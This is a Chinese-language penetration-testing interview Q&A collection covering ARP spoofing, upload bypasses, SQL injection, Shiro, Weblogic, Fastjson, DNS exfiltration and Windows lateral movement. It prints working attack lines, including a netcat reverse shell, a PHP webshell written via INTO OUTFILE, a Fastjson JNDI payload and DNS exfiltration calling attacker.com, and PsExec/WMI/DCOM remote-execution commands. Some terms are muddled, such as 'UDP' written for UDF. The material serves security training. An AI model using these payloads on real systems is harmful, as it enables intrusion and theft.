2026年渗透测试面试题总结-26（题目+回答）

安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

[751 ARP攻击原理与防御](#751 ARP攻击原理与防御)

攻击原理

防御方法

[752 绕过PHP上传限制](#752 绕过PHP上传限制)

[753 SQLmap UDP提权原理](#753 SQLmap UDP提权原理)

[754 WebShell应急响应流程](#754 WebShell应急响应流程)

[755 漏洞挖掘方法论](#755 漏洞挖掘方法论)

[756 GPC绕过技巧](#756 GPC绕过技巧)

[757 安全攻防负责人架构设计](#757 安全攻防负责人架构设计)

[758 CDN绕过方法](#758 CDN绕过方法)

[759 Linux Webshell查杀](#759 Linux Webshell查杀)

[760 SQL注入写Shell条件](#760 SQL注入写Shell条件)

[761 XML注入 vs XXE](#761 XML注入 vs XXE)

[762 打点常用漏洞](#762 打点常用漏洞)

[763 Shiro漏洞发现方法](#763 Shiro漏洞发现方法)

[764 Shiro漏洞类型](#764 Shiro漏洞类型)

[765 Weblogic权限绕过](#765 Weblogic权限绕过)

[766 Fastjson漏洞原理](#766 Fastjson漏洞原理)

[767 Weblogic漏洞类型](#767 Weblogic漏洞类型)

[768 IIOP协议与类比](#768 IIOP协议与类比)

[769 DNS协议出网利用](#769 DNS协议出网利用)

[770 横向渗透命令执行](#770 横向渗透命令执行)

[771 PsExec vs WMI vs WinRM](#771 PsExec vs WMI vs WinRM)

[772 DCOM横向移动操作](#772 DCOM横向移动操作)

[773 域内攻击方法](#773 域内攻击方法)

[774 PHP文件包含函数区别](#774 PHP文件包含函数区别)

[775 全局变量 vs 超全局变量](#775 全局变量 vs 超全局变量)

[776 SQL注入原理](#776 SQL注入原理)

[777 SQL注入分类](#777 SQL注入分类)

[778 SQL注入防御](#778 SQL注入防御)

[779 XSS分类区别](#779 XSS分类区别)

[780 CSRF利用条件](#780 CSRF利用条件)

复制代码
751	ARP攻击原理，防御方法
752	php的站限制了任何php文件上传，如何上传php文件？
753	sqlmap udp提权原理?
754	你是如何做应急响应的呢?查询webshell
755	挖了哪些洞，怎么挖的
756	GPC是什么？开启了怎么绕过
757	如果你是一个安全攻防负责人，如何做好安全架构，整理防御黑客攻击?
758	如何bypass CDN
759	linux被上传了webshell如何查杀？
760	SQL注入写shell的条件，用法
761	xml注入和xxe的区别
762	打点一般会用什么漏洞
763	平常怎么去发现shiro漏洞的
764	shiro有几种漏洞类型
765	weblogic权限绕过有没有了解
766	fastjson漏洞利用原理
767	weblogic有几种漏洞
768	IIOP听说过吗，和什么类似
769	dns出网协议怎么利用
770	横向渗透命令执行手段
771	psexec和wmic或者其他的区别
772	Dcom怎么操作？
773	域内攻击方法有了解过吗
774	include、include_once、require、?require_once区别?
775	全局变量和超全局变量的区别
776	SQL注入原理
777	SQL注入分类
778	SQL注入防御
779	XSS的区别
780	CSRF成功利用的条件
751 ARP攻击原理与防御

攻击原理

欺骗机制：攻击者伪造ARP响应包，将自身MAC地址绑定到网关IP，劫持流量。

双向毒化：同时欺骗网关和主机，实现中间人监听（如窃取密码、会话令牌）。

防御方法
静态绑定 ：
复制代码
Bash
arp -s 192.168.1.1 00:11:22:33:44:55 # 手动绑定IP-MAC
动态检测 ：

部署ARP防火墙（如ARPWatch）实时告警

交换机启用DAI （动态ARP检测）或端口安全

加密通信：强制使用TLS/SSL，即使被监听也无法解密。
752 绕过PHP上传限制
后缀名绕过 ：

上传 .phtml、.php5（若服务器解析配置不当）

双写扩展名：shell.php.jpg（配合Apache解析漏洞）
内容混淆 ：
添加图片头 GIF89a; → 伪装为图片
利用 .htaccess 覆盖解析规则：
复制代码
Apache
AddType application/x-httpd-php .abc
协议利用 ：

上传ZIP文件并配合解压漏洞（如 ../ 路径穿越）
753 SQLmap UDP提权原理

核心流程：
数据库权限获取 ：通过注入点获取高权限账号（如MySQL FILE权限）。

UDF库写入 ：

上传编译后的恶意UDF（如 lib_mysqludf_sys.so）至插件目录。
函数创建 ：
复制代码
Sql
CREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.so';
UDP利用 ：

执行命令：SELECT sys_exec('nc -u 1.2.3.4 53 -e /bin/sh'); → 通过UDP协议反弹Shell。
754 WebShell应急响应流程
复制代码
Mermaid
graph TB A[流量分析] --> B[文件扫描] B --> C[行为监控] C --> D[清除加固]

定位：

日志分析：搜索高频访问路径（grep -r 'eval(' /var/log/apache2/）

文件比对：rkhunter --check 检测篡改文件

清除：

删除恶意文件 + 修复漏洞入口

加固：

限制上传目录执行权限：chmod -R 755 /uploads/

部署RASP（运行时应用自保护）

755 漏洞挖掘方法论

常见漏洞与挖掘技巧：

漏洞类型 挖掘方法 案例

逻辑漏洞业务流重放测试订单金额篡改（负数绕过校验）

API未授权遍历ID参数+越权访问用户信息泄露（UID递增）

SSRF 检测内网IP/域名反射利用Redis未授权写WebShell

756 GPC绕过技巧

GPC机制 ：PHP自动转义 '、"、\、NULL（magic_quotes_gpc=On）。
绕过方案：
数值型注入 ：
复制代码
Sql
id=1 AND 1=1 # 无需引号
编码绕过 ：

Hex编码：SELECT 0x61646d696e → 等价 'admin'

二次注入 ：

存入数据库时被转义 → 取出时原样使用。
757 安全攻防负责人架构设计

三维防御体系：

预防层 ：

SDL流程嵌入：代码审计 + 威胁建模

最小权限原则：IAM角色分离

检测层 ：

全网流量镜像 + AI异常行为分析

Honeypot（蜜罐）诱捕高级攻击

响应层 ：

自动化渗透工具（如Metasploit）对抗测试

红蓝对抗常态化

758 CDN绕过方法

历史DNS记录：查询域名解析历史（如SecurityTrails），获取真实IP。

子域名扫描 ：

*.example.com 可能未接入CDN

服务特征 ：

扫描HTTP头 Server: nginx/1.18（CDN通常隐藏版本）

SSRF利用 ：

通过业务SSRF漏洞探测内网IP

759 Linux Webshell查杀

排查步骤：
进程关联 ：
复制代码
Bash
lsof +L1 # 查找已删除但仍运行的文件 netstat -pant | grep ESTABLISHED
文件检测 ：

查找最近修改的PHP文件：find /var/www/ -mtime -1 -name "*.php"

校验哈希：rpm -Vf /usr/bin/php
清除工具 ：
使用ClamAV + 自定义规则扫描：
复制代码
Bash
clamscan -r --include='.*\.php$' /var/www/
760 SQL注入写Shell条件

必要条件：

数据库具备 FILE 权限（MySQL需 secure_file_priv= 空值）。

Web目录可写且路径已知。
利用命令：
复制代码
Sql
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/shell.php';

实战技巧：

联合查询写入：UNION SELECT 0x3c3f706870... INTO DUMPFILE 'C:/xampp/htdocs/shell.php'

761 XML注入 vs XXE

类型原理危害

XML注入恶意数据破坏XML结构逻辑错误、数据截断

XXE 外部实体引用加载恶意内容文件读取、SSRF、RCE

762 打点常用漏洞

Web入口 ：

框架漏洞（Spring RCE, Struts2 OGNL）

未授权访问（Redis, MongoDB）

服务漏洞 ：

SMB协议（永恒之蓝 MS17-010）

RDP弱密码爆破

人员社工 ：

钓鱼邮件 + 0day漏洞组合攻击

763 Shiro漏洞发现方法

特征识别 ：

Cookie中 rememberMe=deleteMe（Shiro默认标记）

工具扫描 ：

使用ShiroScan检测反序列化漏洞（AES密钥硬编码）

密钥爆破 ：

利用已知密钥字典（如k0ra1n/ShiroKeys）

764 Shiro漏洞类型

反序列化 ：

CVE-2016-4437（默认AES密钥）

权限绕过 ：

CVE-2020-1957（Spring集成缺陷）

认证缺陷 ：

空密码绕过（旧版本配置错误）

765 Weblogic权限绕过

漏洞场景：

CVE-2020-14882：未授权访问 /console/ 管理接口
利用步骤：

访问URL：http://weblogic:7001/console/css/%252e%252e/console.portal

绕过认证直接进入管理后台部署War包。

766 Fastjson漏洞原理

核心机制：
反序列化触发 ：恶意JSON通过 @type 指定危险类（如 JdbcRowSetImpl）。
JNDI注入 ：
复制代码
Json
{ "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://attacker.com/Exploit", "autoCommit": true }
利用链执行：加载远程恶意类 → RCE。
767 Weblogic漏洞类型

反序列化 ：

T3协议漏洞（CVE-2015-4852）

SSRF ：

UDDI模块缺陷（CVE-2014-4210）

RCE ：

WLS核心组件远程代码执行（CVE-2020-2551）

768 IIOP协议与类比

IIOP ：CORBA的通信协议，用于分布式对象通信（类似RMI）。
类比对象：

RMI：Java远程方法调用

DCOM：Windows组件对象模型

769 DNS协议出网利用

数据外带 ：

子域名携带数据：passw0rd.attacker.com → 泄露密码

命令控制 ：

DNS隧道工具：dnscat2 建立交互式Shell

隐蔽扫描 ：

通过DNS查询探测内网主机（如 nslookup 192-168-1-1.attacker.com）

770 横向渗透命令执行
PsExec ：
复制代码
Powershell

复制

PsExec.exe \\192.168.1.2 -u admin -p Passw0rd cmd.exe
WMI ：
复制代码
Powershell

复制

wmic /node:192.168.1.2 process call create "cmd /c whoami"
WinRM ：
复制代码
Powershell
Enter-PSSession -ComputerName 192.168.1.2 -Credential (Get-Credential)
771 PsExec vs WMI vs WinRM

工具优势限制

PsExec 无需复杂配置被杀软重点监控

WMI 支持异步执行依赖135端口

WinRM 加密通信（HTTPS）需提前启用服务

772 DCOM横向移动操作

步骤：
枚举DCOM对象 ：
复制代码
Powershell
Get-CimInstance Win32_DCOMApplication
远程执行 ：
复制代码
Powershell
$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "192.168.1.2")) $com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami", "7")
773 域内攻击方法

凭据盗窃 ：

Mimikatz提取 krbtgt Hash

权限提升 ：

Kerberoasting攻击服务账号

持久化 ：

黄金票据 + 域控Skeleton Key植入

774 PHP文件包含函数区别

函数行为 错误处理

include 包含文件失败仅警告脚本继续执行

require 包含失败则中断抛出Fatal Error

*_once 避免重复包含同原函数

775 全局变量 vs 超全局变量

全局变量 ：需在函数内通过 global $var 显式声明才能访问。

超全局变量 ：自动全局生效（如 $_GET、$_SESSION），无需声明。

776 SQL注入原理

核心缺陷 ：用户输入未经校验直接拼接SQL语句，改变原语义。
示例：
复制代码
Sql
原语句：SELECT * FROM users WHERE id = '1' 攻击输入：1' UNION SELECT 1,database()-- 新语句：SELECT * FROM users WHERE id = '1' UNION SELECT 1,database()-- '

777 SQL注入分类

按结果 ：

报错注入、盲注、Union注入

按技术 ：

布尔盲注、时间盲注、堆叠注入

778 SQL注入防御
参数化查询 ：
复制代码
Python
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
输入过滤 ：

正则拒绝高危字符：[;'"]

最小权限 ：

数据库账户禁用 FILE、EXECUTE 权限。
779 XSS分类区别

类型 触发位置 持久性

反射型 URL参数即时生效非持久

存储型数据库存储后持久生效持久

DOM型前端脚本动态渲染依赖页面状态

780 CSRF利用条件

会话保持：受害者已登录目标站点（Cookie有效）。

请求伪造 ：攻击者可构造恶意请求（如 <img src="http://bank/transfer?to=attacker&amount=1000">）。

无二次验证：关键操作无需Token或短信验证。

漏洞类型	挖掘方法	案例
逻辑漏洞	业务流重放测试	订单金额篡改（负数绕过校验）
API未授权	遍历ID参数+越权访问	用户信息泄露（UID递增）
SSRF	检测内网IP/域名反射	利用Redis未授权写WebShell

类型	原理	危害
XML注入	恶意数据破坏XML结构	逻辑错误、数据截断
XXE	外部实体引用加载恶意内容	文件读取、SSRF、RCE

工具	优势	限制
PsExec	无需复杂配置	被杀软重点监控
WMI	支持异步执行	依赖135端口
WinRM	加密通信（HTTPS）	需提前启用服务

函数	行为	错误处理
include	包含文件失败仅警告	脚本继续执行
require	包含失败则中断	抛出Fatal Error
*_once	避免重复包含	同原函数

类型	触发位置	持久性
反射型	URL参数即时生效	非持久
存储型	数据库存储后持久生效	持久
DOM型	前端脚本动态渲染	依赖页面状态